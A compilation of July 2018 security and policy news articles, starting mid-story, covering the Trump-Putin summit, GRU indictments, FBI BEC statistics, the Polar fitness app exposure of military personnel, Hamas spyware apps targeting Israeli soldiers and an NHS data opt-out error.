"Thanks to our partner agencies here and abroad, Davis now faces justice in an American court," said Manhattan US Attorney Geoffrey Berman.

Until the FBI shut it down in October 2013, the US government called Silk Road "the most sophisticated and extensive criminal marketplace on the Internet" used by vendors in more than 10 countries in North America and Europe.

Texan mastermind Ross Ulbricht was convicted and sentenced to life in prison in 2015 for running the online enterprise that sold $200 million in drugs worldwide.

Operating under the alias "Dread Pirate Roberts," Ulbricht amassed $13 million in commissions by making the purchase of heroin, cocaine and crystal meth as easy as shopping online at eBay or Amazon, the government said.

His four-week trial was considered a landmark case in the murky world of online crime and government surveillance.

Back in Washington, Trump Under Pressure to Reverse Course on Russia
19.7.2018 securityweek BigBrothers

President Donald Trump found himself isolated and under pressure to reverse course Tuesday after publicly challenging the US intelligence conclusion that Russia meddled in the 2016 election during his face-to-face with Vladimir Putin.

At his inaugural summit with the Russian president in Finland, Trump appeared to accept at face value the strongman's denial that Moscow interfered in a bid to undermine the Democrat Hillary Clinton -- a stance that triggered bipartisan outrage at home.

Back in Washington, Trump sounded a defensive note, insisting his meeting with Putin had been "even better" than his one last week with traditional allies NATO -- a testy gathering seen as having badly strained trans-Atlantic ties.

But the US president -- who is expected to speak about the meeting at 2:00 pm (1800 GMT) on Tuesday -- has found precious little support for his decision not to confront Putin, and faced calls even from allies to change tack.

"He has to reverse course immediately and he's gotta get out there as soon as possible before the concrete starts to set on this," former White House communications director Anthony Scaramucci said on CNN.

"Loyalty right now requires you to tell the truth and sit with him and explain to him the optics of the situation, why the optics are bad, the strategy in terms of trying to get along with Vladimir Putin and deploying a strategy of going against the intelligence agency is very bad," Scaramucci said.

Former House speaker and longtime Trump ally Newt Gingrich put it yet more bluntly.

"President Trump must clarify his statements in Helsinki on our intelligence system and Putin," he tweeted as Trump headed home. "It is the most serious mistake of his presidency and must be corrected -- immediately.

Trump's performance at the summit has even come under fire from the hosts at Fox News, usually a reliable defender of the president.

"No negotiation is worth throwing your own people and country under the bus," Fox anchor and Fox & Friends co-host Abby Huntsman -- the daughter of the US ambassador to Russia -- wrote on Twitter.

And former president Barack Obama, who has remained above the political fray since leaving office, appeared to allude to the events of the day before during a rare public appearance Tuesday at which he warned the world had plunged into "strange and uncertain times."

"Strongman politics are ascendant, suddenly, whereby elections and some pretense of democracy are maintained -- the form of it -- but those in power seek to undermine every institution or norm that gives democracy meaning," Obama said in Johannesburg.

- 'Undermine democracy' -

Trump and Putin met for two hours in Helsinki on Monday with only their interpreters present, then held a joint press conference.

Standing alongside the Kremlin boss, Trump acknowledged that his intelligence chiefs believe Russia hacked and leaked Democrats' emails containing politically damaging information about his rival Clinton in 2016.

But, insisting he had won the race fair and square, the Republican said: "I have President Putin, he just said it is not Russia. I will say this: I don't see any reason why it would be."

Special Counsel Robert Mueller's investigation into Russian meddling and possible collusion with the Trump campaign has increasingly put pressure on the White House, and the president -- who regards it as an attack on his legitimacy -- has dubbed it a "witch hunt."

But the investigation continues to progress, resulting in the indictment of 12 Russian military intelligence agents on Friday -- timing that was embarrassing in light of the upcoming summit.

While Trump has faced intense criticism over Helsinki, he is not entirely without defenders.

Republican Senator Rand Paul has given a series of interviews supporting Trump's stance towards Putin, and berating his critics as biased.

"I think the president did a good thing by meeting with Putin and I think it's a mistake for people to try to turn this into a partisan escapade," the Kentucky Republican said on CBS.

Paul's efforts drew praise from Trump, who tweeted: "Thank you @RandPaul, you really get it!"

But the bipartisan consensus has been broadly hostile to Trump's stance -- as the top Republican in Congress, House Speaker Paul Ryan made clear once more at a press conference Tuesday on Capitol Hill.

"We stand by our NATO allies and all those countries who are facing Russian aggression," Ryan said. "Vladimir Putin does not share our interests, Vladimir Putin does not share our values."

"We just conducted a yearlong investigation into Russia's interference in our elections. They did interfere in our elections. It's really clear. There should be no doubt about that," he said.

"Russia is trying to undermine democracy itself."

NIST to Withdraw 11 Outdated Cybersecurity Publications
19.7.2018 securityweek BigBrothers

The U.S. National Institute of Standards and Technology (NIST) announced on Tuesday that its Computer Security Division has decided to withdraw eleven outdated SP 800 publications.

NIST’s 800 series Special Publications (SP) focus on cybersecurity and include guidelines, technical specifications, recommendations, and annual reports. These publications are meant to address and support the security and privacy needs of government agencies, but they are often used and referenced by private sector companies.

NIST’s website currently lists over 180 SP 800 publications, including drafts and final versions. Eleven of them, which are now considered out of date, will be withdrawn on August 1, 2018, and will not be revised or superseded.

The documents will still be available for historical reference, but their status will be changed from “final” to “withdrawn.”

The following SP 800 publications will be withdrawn, with the reason for withdrawal listed for each document:

● SP 800-13 (October 1995): Telecommunications Security Guidelines for Telecommunications Management Network – describes outdated technologies;

● SP 800-17 (February 1998): Modes of Operation Validation System (MOVS): Requirements and Procedures – validation system is for deprecated algorithms, such as DES and Skipjack;

SP 800-19 (October 1999): Mobile Agent Security – environments and technologies far less complex than what is used today;

SP 800-23 (August 2000): Guidelines to Federal Organizations on Security Assurance and Acquisition/Use of Tested/Evaluated Products – based on outdated laws, regulations and executive directives;

● SP 800-24 (April 2001): PBX Vulnerability Analysis: Finding Holes in Your PBX Before Someone Else Does – does not address newer technologies, such as VOIP;

● SP 800-33 (December 2001): Underlying Technical Models for Information Technology Security – describes a model that pre-dates the Risk Management Framework and Cybersecurity Framework;

● SP 800-36 (October 2003): Guide to Selecting Information Technology Security Products – outdated references and it does not reflect current types of security products;

● SP 800-43 (November 2002): Systems Administration Guidance for Securing Windows 2000 Professional System – Windows 2000 no longer supported;

● SP 800-65 (January 2005): Integrating IT Security into the Capital Planning and Investment Control Process – pre-dates the Cybersecurity Framework and other important SP 800 guidance;

● SP 800-68 Rev. 1 (October 2008): Guide to Securing Microsoft Windows XP Systems for IT Professionals: A NIST Security Configuration Checklist – Windows XP no longer supported;

● SP 800-69 (September 2006): Guidance for Securing Microsoft Windows XP Home Edition: A NIST Security Configuration Checklist – Windows XP no longer supported.

US Lifts Export Ban on Suppliers to China's ZTE
18.7.2018 securityweek  BigBrothers

The United States on Friday formally lifted a crippling ban on exports to China's ZTE, rescuing the smartphone maker from the brink of collapse after it was denied key components.

The US Commerce Department said it would continue to monitor the company to prevent further violations of US sanctions on Iran and North Korea.

"While we lifted the ban on ZTE, the Department will remain vigilant as we closely monitor ZTE's actions to ensure compliance with all US laws and regulations," Commerce Secretary Wilbur Ross said in a statement.

But the move to reverse the harsh penalties, made at President Donald Trump's insistence, has left US lawmakers irate. Congress has taken steps to keep the ban in place and accused Trump of rewarding a company which had repeatedly flouted American law, lied to authorities and engaged in espionage.

The about-face to rescue to the company created a stark contrast with the escalating trade war between Washington and Beijing.

The Commerce Department in April banned US companies from supplying ZTE with crucial components, forcing it to halt operations, after officials found further violations even after reaching a settlement in March of last year over the initial complaints.

The company had paid bonuses rather than reprimanding employees involved in illegal activity and created an "elaborate scheme" to deceive US officials and obstruct justice, US officials said.

But as a favor to Chinese President Xi Jinping, Trump ordered Commerce to ease the penalties on ZTE.

In an agreement struck last month, Washington agreed to lift the export ban if ZTE paid an additional $1 billion fine -- beyond the $892 million penalty imposed in 2017.

The company also was required to replace its board of directors, retain outside monitors and put $400 million in escrow to cover any future violations -- a final step it took this week.

In a statement this week, Senator Mark Warner of Virginia, the senior Democrat on the Select Committee on Intelligence, lambasted the reversal, saying the US military and spy agencies had branded ZTE an "ongoing threat" to US national security.

"This sweetheart deal not only ignores these serious issues, it lets ZTE off the hook for evading sanctions against Iran and North Korea with a slap on the wrist," Warner said.

BEC Scam Losses Top $12 Billion: FBI
18.7.2018 securityweek  BigBrothers

The losses and potential losses reported as a result of business email compromise (BEC) and email account compromise (EAC) scams exceed $12 billion globally, according to an alert published last week by the FBI.

The report is based on data collected by the FBI’s Internet Crime Complaint Center (IC3), international law enforcement and financial institutions between October 2013 and May 2018. The amounts represent both money that was actually lost by victims and money they could have lost had they taken the bait.

BEC scams, which involve sending requests for fund transfers and personally identifiable information from hijacked business email accounts, have been observed in 50 U.S. states and 150 countries, with money being sent to 115 countries.

The top destinations for money generated by BEC scams are Asian banks in China and Hong Kong, but a significant number of schemes involve financial organizations in the U.K., Mexico and Turkey.

According to the FBI, more than 78,000 complaints have been made globally between October 2013 and May 2018, with over 41,000 victims reported in the United States. Targeted individuals and businesses lost or could have lost $12.5 billion, nearly $3 billion of which in the U.S. Losses increased by 136% between December 2016 and May 2018.

The number of non-U.S. victims known to the FBI is 2,565, with losses totaling over $670 million.

In comparison, the FBI’s previous report on BEC scams, which covered the period between October 2013 and December 2016, said there had been 40,203 incidents globally with exposed losses totaling over $5.3 billion.

In its recent 2017 Internet Crime Report, the FBI said IC3 received over 15,000 BEC and EAC complaints last year, reporting losses of $675 million.

The law enforcement agency highlighted that the real estate sector continues to be increasingly targeted. Victims include law firms, title companies, real estate agents, sellers, and buyers.

In scams targeting this sector, the fraudsters use spoofed emails on behalf of real estate transaction participants and instruct recipients to transfer money into fraudulent accounts.

“Based on victim complaint data, BEC/EAC scams targeting the real estate sector are on the rise,” the FBI said. “From calendar year 2015 to calendar year 2017, there was over an 1100% rise in the number of BEC/EAC victims reporting the real estate transaction angle and an almost 2200% rise in the reported monetary loss. May 2018 reported the highest number of BEC/EAC real estate victims since 2015, and September 2017 reported the highest victim loss.”

BEC scam losses in real estate sector

The topic of BEC scams and how the threat can be prevented using human-powered intelligence was covered recently in a SecurityWeek column by Josh Lefkowitz, CEO of business risk intelligence firm Flashpoint.

“BEC underscores why even the most technically sophisticated cyber defenses aren’t always a match for low-tech threats. Combating BEC requires more than just advanced technologies and robust perimeter security—it requires humans to understand the threat,” Lefkowitz said.

12 Russian Intelligence Officers Indicted for Hacking U.S. Democrats
18.7.2018 securityweek  BigBrothers

Twelve Russian intelligence officers were indicted by a US grand jury on Friday -- just three days before President Donald Trump is scheduled to meet with Russia's Vladimir Putin -- for interfering in the November 2016 presidential election.

The charges were drawn up by Special Counsel Robert Mueller, the former FBI director who is looking into Russian interference in the 2016 vote and whether any members of Trump's campaign colluded with Moscow.

The indictment accuses members of Russia's military intelligence agency known as the GRU of carrying out "large-scale cyber operations" to steal Democratic Party documents and emails.

Deputy Attorney General Rod Rosenstein, who announced the indictment at a press conference in Washington, said "there's no allegation in this indictment that any American citizen committed a crime."

Rosenstein said "the conspirators corresponded with several Americans during the course of the conspiracy through the internet."

However, "there's no allegation in this indictment that the Americans knew they were corresponding with Russian intelligence officers," he said.

Rosenstein also stressed that "there's no allegation that the conspiracy changed the vote count or affected any election result."

Rosenstein said he briefed Trump about the indictment before Friday's announcement and that the timing was determined by "the facts, the evidence, and the law."

The deputy attorney general's press conference came as Trump was meeting Queen Elizabeth II and just three days before his meeting with Putin in Helsinki.

- Calls to cancel Putin meeting -

Senator Chuck Schumer, the Democratic Senate minority leader, immediately called on Trump to cancel the Putin talks.

"These indictments are further proof of what everyone but the president seems to understand: President Putin is an adversary who interfered in our elections to help President Trump win," Schumer said in a statement.

"President Trump should cancel his meeting with Vladimir Putin until Russia takes demonstrable and transparent steps to prove that they won't interfere in future elections," he said.

Speaking earlier Friday, before the indictments were announced, Trump said he would ask Putin about the allegations of Russian election meddling.

"I will absolutely, firmly ask the question, and hopefully we'll have a good relationship with Russia," he told a joint press conference with British Prime Minister Theresa May.

But he simultaneously denounced the Mueller investigation as a "rigged witch hunt," and said he has been "tougher on Russia than anybody."

"We have been extremely tough on Russia," Trump said.

The US president recalled that 60 intelligence officers were expelled from the Russian embassy in Washington in response to a nerve agent attack on a former Russian spy in Britain.

Russia has denied any involvement in the attack and rejected accusations that it interfered in the US presidential election in a bid to bring about the defeat of Democrat Hillary Clinton.

Rosenstein said 11 of the Russians indicted Friday were charged with "conspiring to hack into computers, steal documents, and release those documents with the intent to interfere in the election.

"One of those defendants and a 12th Russian are charged with conspiring to infiltrate computers of organizations involved in administering elections," he added.

"The defendants accessed email accounts of volunteers and employees of a US presidential campaign, including the campaign chairman starting in March of 2016," the deputy attorney general said.

"They also hacked into the computer networks of a congressional campaign committee and a national political committee."

Departing Apple Engineer Stole Autonomous Car Tech: FBI
18.7.2018 securityweek  BigBrothers

An ex-Apple engineer on Monday was charged with stealing secrets from a hush-hush self-driving car technology project days before he quit to go to a Chinese startup.

Xiaolang Zhang was in custody for stealing trade secrets from the Apple project, according to a copy of the criminal complaint posted online.

The charge is punishable by 10 years in prison and a $250,000 fine.

"Apple takes confidentiality and the protection of our intellectual property very seriously," the California-based internet titan said in response to an AFP query.

"We're working with authorities on this matter and will do everything possible to make sure this individual and any other individuals involved are held accountable for their actions."

Zhang was hired by Apple in December of 2015 to be part of a team developing hardware and software for self-driving vehicles, a project that was a "closely-guarded secret," according to the complaint filed by the FBI.

Zhang took paternity leave in the month of April, going with his family to China.

Upon his return to Apple at the end of April, he told a supervisor he was quitting to return to China to be near his ailing mother.

Zhang mentioned he planned to go work for a Chinese self-driving vehicle startup called Xiaopeng Motors, or XMotors, in Guangzhou, according to the complaint.

The supervisor thought Zhang "evasive" and brought in an Apple product security team, which had Zhang turn in all company devices and walked him off campus, according to the filing.

Apple security found that Zhang's activity on the company network surged "exponentially" in the days before he returned from paternity leave.

Zhang did searches of confidential databases, and downloaded technical files, the criminal complaint said.

Documents downloaded by Zhang included some on topics such as "prototypes," according to the case against him.

Apple also had closed-circuit camera recording of Zhang going into autonomous driving tech team labs late on a Saturday night while he was on paternity leave, according to the filing.

Zhang later admitted to taking circuit boards and a Linux server from the hardware lab, and to transferring some Apple files to his wife's computer, the FBI said in the complaint.

Zhang was "voluntarily terminated" from Apple in early March, and FBI agents searched his home in June as part of their investigation.

Zhang told the FBI at that time he was working at XMotors offices in Silicon Valley, according to the complaint.

Zhang was heading to China with a "last-minute round-trip ticket" when FBI agents arrested him at an airport in the Silicon Valley city of San Jose, the filing said.

Outdated DoD IT Jeopardizes National Security: Report
18.7.2018 securityweek  BigBrothers

Failure to Modernize Legacy DoD Systems is Putting U.S. National Security in Jeopardy, Report Claims

In a new study titled 'Innovation Imperative: The Drive to Modernize DoD', Meritalk queried 150 federal IT managers working in Department of Defense (DoD) organizations. The stated objective was "to understand the state of their IT infrastructure and applications." This was to include levels of satisfaction, an indication of where missions are being met or missed, and what should be done next.

In fact, this report is solely about DoD IT managers' attitude towards cloud migration -- which is perhaps unsurprising since the survey was underwritten by AWS and Red Hat.

The results confirm a strong belief that cloud is the way forward -- and perhaps the only way for the U.S. military to maintain an advantage over the world's other super powers: China and increasingly Russia. For example, 80% of the respondents say the DoD needs to improve the use of cloud to maintain the military’s technical advantage and support mission success; and 81% say accelerating DoD’s adoption of cloud is critical.

86% of respondents said that failing to modernize legacy DoD systems is putting U.S. national security in jeopardy.

The increasing use of artificial intelligence and big data analytics by the military, the need for more efficient data sharing between agencies, and the power to transcribe and translate massive amounts of recorded voice in almost real time can only be served by the power and flexibility of the cloud.

PentagonRespondents to the survey specifically see DoD cloud adoption important for big data analytics (85%), electronic warfare (83%), shared services (82%), DevOps (81%), AI (77%), IoT (73%), machine learning (72%) and blockchain (61%). But this understanding is not new to the DoD.

The Joint Enterprise Defense Infrastructure (JEDI) initiative is a plan for the DoD to acquire its own commercial cloud infrastructure suitable to hold DoD data at all classification levels, and available to any organization in DoD. It is a massive project spread over a ten-year ordering period, and thought to have a budget of around $10 billion over that timeframe.

It is believed that the DoD's preference is to award the project to a single provider; and it is equally believed that AWS is the frontrunner. Smaller existing cloud providers would lose out, and have been lobbying for a multi-provider approach. Microsoft, Google and IBM are also rumored to be interested in bidding for the project.

There is little mention of JEDI within the Meritalk survey. However, 51% of the respondents said they believe that a single-vendor cloud solution has more pros than cons. Sixty-three percent said that talk about JEDI has had "a positive impact on the pace of their organization’s IT modernization efforts"; and "72% feel utilizing multiple cloud vendors would increase the complexity of their organization’s system integrations."

The Meritalk survey, underwritten by AWS and Red Hat, offers strong support for the DoD's single supplier JEDI preference, where AWS (most probably backed by Red Hat software) is the frontrunner.

But regardless of who wins the JEDI provider contract, the survey also demonstrates that DoD IT managers are ready to increase their migration to the cloud. More than 50% of the respondents would recommend moving 50% of their current data to the cloud (13% would move 'the vast majority' of their data). They are unlikely -- and in some cases for reasons of national security unable -- to adopt a cloud-only strategy.

This will set the DoD on a path directly parallel to that faced by commercial enterprises today -- to what extent should existing infrastructures and data be migrated to the cloud, how can it be achieved, and how do you secure it. The only primary difference is that DoD already knows which cloud; that is, the JEDI cloud.

"The survey shows that the interest and promise of the cloud is well recognized, but the DoD would benefit from the lessons being learned right now by large private enterprises going through the same processes," Ken Spinner, VP of field engineering at Varonis told SecurityWeek. "Private industry, which is often recognized for its agility and embrace of new technologies, still largely works with a hybrid mix of cloud and on-premises systems and storage."

"One thing is certain," agrees Rick Moy, head of marketing at Acalvio: "hybrid networks, or cloud and on-premises." Both agree that adoption of JEDI -- or any other cloud solution -- will present the DoD organizations with both challenges and opportunities.

"There’s no easy button and the cloud is not without risks," says Spinner. "Another concern, and perhaps the weakest link, are the defense contractors that access confidential intelligence as part of their daily workload. It’s far too tempting for a few bad actors to breach a system and attempt to steal data -- the cloud needs to be protected just like on-premises systems and data. Another challenge will be to ensure that the security capabilities people currently have with on-prem solutions are available and tested with both pure cloud solutions and hybrid solutions."

But Moy adds the possibility of 'starting over'. "“I would argue that a move to cloud represents a fresh opportunity to build in better security and advanced monitoring capabilities," he told SecurityWeek: "ones that we may have overlooked in on-premises deployments. For instance, unified policy, access controls, deception, logging and monitoring, and so on."

The JEDI project shows that the DoD hierarchy is already set on a cloud future; and the Meritalk survey shows that individual DoD IT managers are ready for the challenge. "As DoD knows," concludes the Meritalk report, "cloud isn’t the final destination -- but it sets the foundation for necessary innovation, collaboration, and next-generation technologies like big data analytics, shared services, AI, and electronic warfare. Agencies must keep their eyes on the future and consider cloud in terms of broader IT modernization efforts government-wide."

Fitness App Revealed Data on Military, Intelligence Personnel
12.7.2018 securityweek  BigBrothers

Mobile fitness app Polar has suspended its location tracking feature after security researchers found it had revealed sensitive data on military and intelligence personnel from 69 countries.

The revelation on the application from Finnish-based app Polar Flow comes months after another health app, Strava, was found to have showed potentially sensitive information about US and allied forces around the world.

Security researchers in the Netherlands said Sunday they were able to find data on some 6,000 individuals including military personnel from dozens of countries and employees of the FBI and National Security Agency.

The disclosure illustrates the potential security risks of using fitness apps which can track a person's location, and which may be "scraped" for espionage.

"With only a few clicks, a high-ranking officer of an airbase known to host nuclear weapons can be found jogging across the compound in the morning," security researcher Foeke Postma said in a blog post Sunday after an investigation with the Dutch news organization De Correspondent.

"We can find Western military personnel in Afghanistan through the Polar site. Cross-checking one name and profile picture with social media confirmed one soldier or officer's identity."

The investigation found detailed personal information, including home addresses, of military personnel, persons serving on submarines, Americans in the Green Zone in Baghdad and Russian soldiers in Crimea, the researchers said.

Polar said in a statement it was suspending the app's feature that allowed users to share data, while noting that any data made public was the result of users who opted in to location tracking.

"It is important to understand that Polar has not leaked any data, and there has been no breach of private data," the statement said.

It said the location tracking feature "is used by thousands of athletes daily all over the world to share and celebrate amazing training sessions."

According to De Correspondent, only about two percent of Polar users chose to share their data, but that nonetheless allowed anyone to discover potentially sensitive data from military or civilian personnel.

"We found the names and addresses of personnel at military bases including Guantanamo Bay in Cuba, Arbil in Iraq, Gao in Mali, and bases in Afghanistan, Saudi Arabia, Qatar, Chad, and South Korea," the report said.

In January, the Pentagon said it was reviewing its policies on military personnel use of fitness application after Strava's map showed a series of military bases in Iraq as well as sites in Afghanistan.

Polar fitness app broadcasted sensitive data of intelligence and military personnel
11.7.2018 securityaffairs BigBrothers

The Mobile fitness app Polar has suspended its location tracking feature due to the leakage of sensitive data on military and intelligence personnel.
A new privacy incident involved Fitness application and military. this time the Mobile fitness app Polar has suspended its location tracking feature due to the leakage of sensitive data on military and intelligence personnel from 69 countries.

This is the second incident in a few months, in January experts discovered that military worldwide have publicly shared online their exercise routes recorded through the fitness tracker Strava revealing the fitness sessions conducted inside or near military bases.

During the weekend, Dutch security experts revealed they were able to find data on some 6,000 individuals including military personnel from dozens of countries and FBI and National Security Agency personnel.

According to an investigation by the news website Bellingcat and the Dutch news agency De Correspondent, the fitness devices were leaking data belonging to the military or intelligence officials who could be exploited by a threat actors to spy on them.

“With only a few clicks, a high-ranking officer of an airbase known to host nuclear weapons can be found jogging across the compound in the morning,” explained the security researcher Foeke Postma that investigated the case with the Dutch news outlet De Correspondent.

“We can find Western military personnel in Afghanistan through the Polar site. Cross-checking one name and profile picture with social media confirmed one soldier or officer’s identity.”


The experts discovered detailed personal information, including home addresses, of military personnel, persons serving on submarines, Americans in the Green Zone in Baghdad and Russian soldiers in Crimea.

The exposure of such data poses serious risks to the military personnel as reported in a post published by Defensenews.com.

“Bellingcat was able to pinpoint the name of a “high-ranking officer” at a base known to host nuclear weapons. It took just a few clicks. Using the Polar Flow app and other information found on the internet, De Correspondent was able to collect a disturbing amount of one Dutch solider’s personal information.” reads the blog post published by Defensenews.com.

“They found the name of the solider, the fact he was stationed at one of the key locations where the war against the Islamic State is being waged from, the soldier’s home address, and the names of his wife and kids.”

In response to the privacy incident, Polar has disabled the feature that allowed users to share data and pointed out that any data made public was the result of users who opted in to location tracking.

The company has already implemented a number of measures to mitigate the exposure of its users along with the suspension for the Flow Explore feature until further notice.

The location tracking feature allows thousands of athletes daily all over the world to share and data related to their training sessions.

“If there hasn’t been a data breach, why have you suspended the Explore feature?

While the decision to opt-in and share training sessions and GPS location data is the choice and responsibility of the customer, we are aware that potentially sensitive locations were appearing in public data, and have made the decision to suspend the Explore until further notice.” reads the statement published by Polar.

“I have seen statements that suggest that Polar leaked data – Did Polar leak any data?Contrary to what has been reported—it’s important to clarify that Polar has not leaked any data. Furthermore, there has been no breach of private data.”

De Correspondent investigation revealed that only about two percent of Polar users chose to share their data, but journalists and experts were able to collect sensitive data from military or civilian personnel.

“We found the names and addresses of personnel at military bases including Guantanamo Bay in Cuba, Arbil in Iraq, Gao in Mali, and bases in Afghanistan, Saudi Arabia, Qatar, Chad, and South Korea,” states the De Correspondent report.

Chinese hackers breached into systems at Australian National University … and are still there
6.7.2018 securityaffairs BigBrothers

Chinese hackers breached into the systems of Australian National University (ANU) and according to the experts they are still there.
Chinese hackers continue to target organizations worldwide, this time attackers based in China breached into the systems of Australian National University (ANU), one of the most prestigious Australian universities.

The bad news is that experts are still working to lock the hackers out because the threat is still active in the network of the Australian University.

“The ABC has been told the Australian National University (ANU) system was first compromised last year.” reported the ABC news.

The ANU had been working with intelligence agencies for several months to contain the threat and minimize its impact.

“The university has been working in partnership with Australian government agencies for several months to minimise the impact of this threat, and we continue to seek and take advice from Australian government agencies,” reads the official statement published by the Australian National University.

“Current assessments indicate no staff, student or research information has been taken and counter-measures are being undertaken.”

Chinese hackers

The Cyber Security Minister Angus Taylor pointed out that the Australian Government “condemns any malicious activity” that targets the systems of the country.

“We know that nation states and criminal groups actively target research and tertiary institutions to steal the intellectual property of hardworking Australians,” he said.

“Malicious cyber activity against Australia’s national interests, whether from criminal syndicates or foreign states, is increasing in frequency, sophistication and severity, and the Australian Government’s highest priority is ensuring Australians are safe and our interests are secure.”

Mr Taylor confirmed that the Australian Cyber Security Centre (ACSC) had been supporting ANU in this case.

“The Australian Cyber Security Centre works closely with any affected organisations to reduce the likelihood of threat actors being successful and to help them recover when they are compromised,” he said.

Australian systems are always under attack, in October 2016 a report published by the Australian Cyber Security Centre confirmed the Australian Bureau of Meteorology hack was powered by foreign cyber spies.

In December 2015 the Australian Broadcasting Corporation (ABC) revealed that a supercomputer operated by the Australian Bureau of Meteorology (BoM) was hit by a cyber attack. The Bureau of Meteorology is Australia’s national weather, climate, and water agency, it is the analog of the USA’s National Weather Service.

The supercomputer of the Australian Bureau of Meteorology targeted by the hackers is also used to provide weather data to defense agencies, its disclosure could give a significant advantage to a persistent attacker for numerous reasons.

Initial media reports blamed China for the cyber attack, in 2013 Chinese hackers were accused by authorities of stealing the top-secret documents and projects of Australia’s new intelligence agency headquarters.

Hamas cyber-operatives lure Israeli soldiers to spyware hidden in tainted apps

6.7.2018 securityaffairs BigBrothers

Israeli military intelligence accused Hamas operatives of creating tainted apps to lure soldiers into downloading spyware onto their phones.
According to a report published by the Israeli military, Hamas hackers are attempting to lure Israel Defence Forces (IDF) soldiers into installing tainted apps on their devices.

Israeli military already blamed Hamas of similar attacks, but this time the hackers managed to serve the apps through the official Google Play Store to increase the likelihood of success.

The experts from the Israel firm ClearSky have identified the following apps:

WinkChat – com.winkchat.apk (dating app)
GlanceLove – com.coder.glancelove.apk (dating app)
Golden Cup – anew.football.cup.world.com.worldcup.apk (Wordcup app)
Hamas GlanceLove fake app

Hamas operatives created a number of fake Facebook profiles using photos of attractive women to lure IDF soldiers into private conversations, then trick them into installing one of the compromised apps.

Israeli military officials explained that Hamas operatives adopted the same tactic in a campaign launched in January-

In January, the hackers used the profile of a woman named “Elianna Amer,” in these last attacks, that lasted at least for three months, they used the profile of a woman named “Lina Kramer.”

“I got a message on Facebook that looked innocent at first, from someone named Lina Kramer, we started talking on Facebook, then we moved to Whatsapp, and then she asked me to download an app called GlanceLove,” explained a former IDF soldier.

“At this stage, my suspicion was final, and I decided to consult a friend who helped me understand that it was a fictitious profile with malicious intentions. From there I turned to the information security officer in my unit who helped me.”

According to Israeli army intelligence officers, the attacks failed to damage military security.

“No damage was done, as we stopped it in time,” one of the officers said.

Th Israeli newspaper Haaretz provided a different version of the facts, it reported that at least “hundreds” of soldiers were infected.

“Hamas managed to hack into the phones of hundreds of Israeli soldiers using dating and World Cup apps and managed to gather sensitive information about the military and some of its bases around the Gaza strip.” reported Haaretz.

“The apps allowed malicious software controlled by Hamas to be planted into Android smartphones, enabling militants in the Strip to access pictures, phone numbers and email addresses of soldiers posted close to the border, and even allowed Hamas to control the phones’ cameras and microphones remotely.”

The analysis of the apps revealed they were tainted with a spyware that can take over devices and exfiltrate sensitive data.

According to the experts, threat actor behind these attacks is codenamed Arid Viper.

In 2015, security experts at Trend Micro uncovered a cyber espionage campaign, dubbed Operation Arid Viper, that targeted Israeli institutions. The Operation Arid Viper was run by Arab-speaking hackers that sought to extract sensitive documents by sending phishing emails. The phishing campaigns targeted government office, infrastructure providers, a military organization, and academic institutions in Israel and Kuwait

In the past, security experts linked Hamas operatives to another APT tracked as Gaza Cybergang (Gaza Hackers Team or Molerats).

NHS Digital Erroneously Reveals Data of 150,000 Patients
5.7.2018 securityweek BigBrothers

On Monday July 2, Jackie Doyle-Price, the parliamentary under-secretary of state for health, delivered a written statement to the UK parliament. It explained that 150,000 NHS patients who had specifically opted out of the NHS patient data-sharing regime were in fact not opted out.

"As a result," says the statement, "these objections were not upheld by NHS Digital in its data disseminations between April 2016, when the NHS Digital process for enabling them to be upheld was introduced, and 26 June 2018. This means that data for these patients has been used in clinical audit and research that helps drive improvements in outcomes for patients."

NHS Digital is the national information and technology partner to the health and social care system. It has responsibility for standardizing, collecting and publishing data and information from across the health and social care system in England. It is therefore responsible for storing and disseminating NHS patient data to those qualified to receive it.

On the same day, NHS Digital released its own statement. "We apologize unreservedly for this issue, which has been caused by a coding error by a GP system supplier (TPP) and means that some people's data preferences have not been upheld when we have disseminated data. The TPP coding error meant that we did not receive these preferences and so have not been able to apply them to our data."

It seems that a software error in an application named SystmOne, written by software firm TPP and designed to allow patients to opt out of data sharing at their local NHS surgery, failed to record the objections. Those objections were therefore not relayed to NHS Digital. Since the system relies on patients opting out rather than opting in to data sharing, NHS Digital assumed that all patients had agreed.

The software error was detected on 28 June, three years after SystmOne was released, when TPP switched to a new system. Neither Jackie Doyle-Price nor NHS Digital has given figures on how many times this data might have been erroneously shared externally during this period. However, NHS Digital compiles and publishes a register of organizations that receive patient data. The most recent publication (XLS) covers the period from December 2017 to February 2018. It shows that patient data was shared more than 5,300 times in these three months.

It also shows where the data shared is considered to be sensitive or non-sensitive, and whether the data was anonymized or is identifiable. The anonymization is performed in accordance with the UK data protection regulator's requirements; but many privacy activists do not believe that anonymization is irreversible.

"As part of our commitment to the secure and safe handling of health data, on 25 May 2018 [the date on which GDPR became required] the Government introduced the new national data opt-out. The national data opt-out replaces Type 2 objections. This has simplified the process of registering an objection to data sharing for uses beyond an individual's care. The new arrangements give patients direct control over setting their own preferences for the secondary use of their data and do not require the use of GP systems, and therefore will prevent a repeat of this kind of GP systems failure in the future."

It remains an opt-out of data sharing rather than an opt-in to data sharing -- the latter being generally required by GDPR.

Dr John Parry, Clinical Director at TPP, said: "TPP and NHS Digital have worked together to resolve this problem swiftly. The privacy of patient data is a key priority for TPP, and we continually make improvements to our system to ensure that patients have optimum control over information. In light of this, TPP apologizes unreservedly for its role in this issue."

NHS Digital added, "We are confident that we are now respecting all opt-outs that have been recorded in the system. We will also be contacting organizations with whom we have shared data that may have been affected, and work with them to destroy the data where possible."

In an emailed comment, Mike Smart, a security strategist at Forcepoint, told SecurityWeek, "In this case, it appears the underlying program left patient data exposed, even though each party involved in handling the data was aware of the privacy policy settings. It's a clear indicator that relying too heavily on software will cause these mistakes to happen in the future. We can't afford to leave out the human element when deciding how we protect sensitive data, and must involve creative and lateral thinking in the testing and final checking stage before software goes live."

Israel Accuses Hamas of Targeting Soldiers With World Cup App
4.7.2018 securityweek BigBrothers

Tel Aviv - Israeli military intelligence on Tuesday accused Hamas hackers of creating a World Cup app and two online dating sites to tempt soldiers into downloading spyware onto their phones.

Briefing journalists at national defence headquarters in Tel Aviv, army intelligence officers said the scam by members of the Palestinian Islamist movement that runs the Gaza Strip failed to damage military security.

"No damage was done, as we stopped it in time," one of the officers said, with the military's response codenamed "Operation Broken Heart".

But he said the attempt showed the Islamist militants had adopted new tactics since a similar attempt was revealed in January 2017.

The emphasis then was solely on the dating game, with the hackers posing online as attractive young women seeking to lure men in uniform into long chats.

This time the traps were aimed at both sexes and there was the additional bait of World Cup action with an app offering "HD live streaming of games, summaries and live updates".

